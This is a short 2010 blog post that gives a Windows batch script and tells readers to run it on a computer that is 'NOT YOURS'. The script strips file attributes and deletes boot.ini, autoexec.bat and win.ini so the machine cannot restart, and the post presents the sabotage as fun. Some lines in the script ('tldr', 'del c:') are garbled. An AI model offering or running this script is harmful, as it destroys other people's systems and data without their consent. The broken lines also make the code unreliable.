Sunday, November 7, 2010

Shutdown a Computer For Ever (NOT YOURS)

Open up notepad and copy and paste the codes given below. Save it as a .bat file.To do this click on Save As.Select all file types and give the name as something.bat.


@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:
tldr
del c:
tldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini

This should shut down the computer on which the file will be executed. It shuts it off once and deletes the files needed to reboot and restart. Have fun …njoy!!

REMEMBER – DO NOT CLICK THIS FILE. YOU WONT RECOVER YOUR COMPUTER BACK AFTER YOU OPEN THE .BAT FILE!